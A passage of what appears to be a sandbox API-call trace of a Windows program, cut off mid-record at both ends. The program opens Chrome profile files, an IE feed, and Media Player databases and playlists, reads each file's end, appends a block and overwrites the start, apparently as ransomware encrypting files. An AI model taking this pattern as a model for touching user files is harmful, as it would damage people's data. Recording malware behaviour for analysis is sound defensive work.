lpWideCharStr="Favicons", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Favicons", lpUsedDefaultChar=0x0) returned 8 [0174.169] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.234] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4000 [0174.234] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.279] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4000 [0174.279] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.280] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0174.280] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0174.280] CloseHandle (hObject=0x1fc) returned 1 [0174.300] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0174.301] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.301] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3c00 [0174.301] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.301] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.302] ReleaseMutex (hMutex=0x168) returned 1 [0174.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Network Action Predictor", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0174.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Network Action Predictor", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Network Action Predictor", lpUsedDefaultChar=0x0) returned 24 [0174.302] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.311] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2c00 [0174.311] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.316] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2c00 [0174.317] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.318] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0174.318] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0174.318] CloseHandle (hObject=0x1fc) returned 1 [0174.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0174.320] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.320] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x10 [0174.320] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.320] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.320] ReleaseMutex (hMutex=0x168) returned 1 [0174.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CURRENT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0174.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CURRENT", cchWideChar=7, lpMultiByteStr=0x1f7ad5c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CURRENT", lpUsedDefaultChar=0x0) returned 7 [0174.320] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f732c8, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f732c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x10, lpOverlapped=0x0) returned 1 [0174.321] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0174.321] WriteFile (in: hFile=0x1fc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x598, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x598, lpOverlapped=0x0) returned 1 [0174.322] CloseHandle (hObject=0x1fc) returned 1 [0174.322] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0174.322] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.323] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1082a [0174.323] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.323] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.323] ReleaseMutex (hMutex=0x168) returned 1 [0174.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Local State", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0174.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Local State", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Local State", lpUsedDefaultChar=0x0) returned 11 [0174.323] ReadFile (in: hFile=0x1fc, lpBuffer=0x2842968, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2842968*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0174.407] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf82a [0174.407] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.416] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf82a [0174.416] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.416] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0174.416] WriteFile (in: hFile=0x1fc, lpBuffer=0x3d1bb28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d1bb28*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0174.416] CloseHandle (hObject=0x1fc) returned 1 [0174.416] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0174.417] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.417] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7000 [0174.418] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.418] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.418] ReleaseMutex (hMutex=0x168) returned 1 [0174.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery~.feed-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0174.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery~.feed-ms", cchWideChar=26, lpMultiByteStr=0x1f8fc3c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Web Slice Gallery~.feed-ms", lpUsedDefaultChar=0x0) returned 26 [0174.418] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.421] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6000 [0174.421] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.450] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6000 [0174.450] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.451] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0174.451] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0174.451] CloseHandle (hObject=0x1fc) returned 1 [0174.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0174.452] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.452] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x105000 [0174.453] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.453] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.453] ReleaseMutex (hMutex=0x168) returned 1 [0174.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CurrentDatabase_372.wmdb", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0174.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CurrentDatabase_372.wmdb", cchWideChar=24, lpMultiByteStr=0x1f8fc3c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CurrentDatabase_372.wmdb", lpUsedDefaultChar=0x0) returned 24 [0174.453] ReadFile (in: hFile=0x1fc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0174.465] ReadFile (in: hFile=0x1fc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.469] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x104000 [0174.470] ReadFile (in: hFile=0x1fc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0174.492] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x104000 [0174.492] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0174.492] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0174.492] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.493] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0174.493] CloseHandle (hObject=0x1fc) returned 1 [0174.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0174.494] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.494] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x410 [0174.495] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.495] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.495] ReleaseMutex (hMutex=0x168) returned 1 [0174.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="07_TV_recorded_in_the_last_week.wpl", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0174.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="07_TV_recorded_in_the_last_week.wpl", cchWideChar=35, lpMultiByteStr=0x1fa54dc, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="07_TV_recorded_in_the_last_week.wpl", lpUsedDefaultChar=0x0) returned 35 [0174.495] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x2d5f2bc*=0x410, lpOverlapped=0x0) returned 1 [0174.497] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0174.497] WriteFile (in: hFile=0x1fc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x998, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x998, lpOverlapped=0x0) returned 1 [0174.508] CloseHandle (hObject=0x1fc) returned 1 [0174.508] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0174.509] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.509] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4f3 [0174.509] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0174.509] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.509] ReleaseMutex (hMutex=0x168) returned 1 [0174.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="03_Music_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0174.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="03_Music_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa54dc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="03_Music_rated_at_4_or_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0174.509] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f3be08, nNumberOfBytesToRead=0x4f3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3be08*, lpNumberOfBytesRead=0x2d5f2bc*=0x4f3, lpOverlapped=0x0) returned 1 [0175.808] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0175.808] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xa7b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f2d0*=0xa7b, lpOverlapped=0x0) returned 1 [0177.153] CloseHandle (hObject=0x1fc) returned 1 [0177.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0178.289] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0178.290] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x249 [0178.290] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0178.290] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.290] ReleaseMutex (hMutex=0x168) returned 1 [0178.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="11_All_Pictures.wpl", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0178.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="11_All_Pictures.wpl", cchWideChar=19, lpMultiByteStr=0x1f8867c, cbMultiByte=19, lpDefaultChar=0x0, 